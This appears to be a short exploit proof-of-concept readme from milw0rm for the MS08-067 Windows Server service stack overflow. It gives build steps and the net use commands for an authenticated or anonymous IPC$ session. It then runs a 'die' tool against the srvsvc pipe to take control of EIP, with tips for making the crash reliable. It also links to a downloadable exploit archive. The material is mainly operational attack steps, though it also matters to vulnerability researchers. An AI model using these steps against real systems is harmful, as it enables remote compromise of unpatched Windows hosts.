In vstudio command prompt:

mk.bat

next:

attach debugger to services.exe (2k) or the relevant svchost (xp/2k3/...)

net use \\IPADDRESS\IPC$ /user:user creds
die \\IPADDRESS \pipe\srvsvc

In some cases, /user:"" "", will suffice (i.e., anonymous connection)

You should get EIP -> 00 78 00 78, a stack overflow (like a guard page
violation), access violation, etc. However, in some cases, you will get
nothing.

This is because it depends on the state of the stack prior to the "overflow".
You need a slash on the stack prior to the input buffer.

So play around a bit, you'll get it working reliably...

poc:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/6824.zip (2008-ms08-067.zip)

# milw0rm.com [2008-10-23]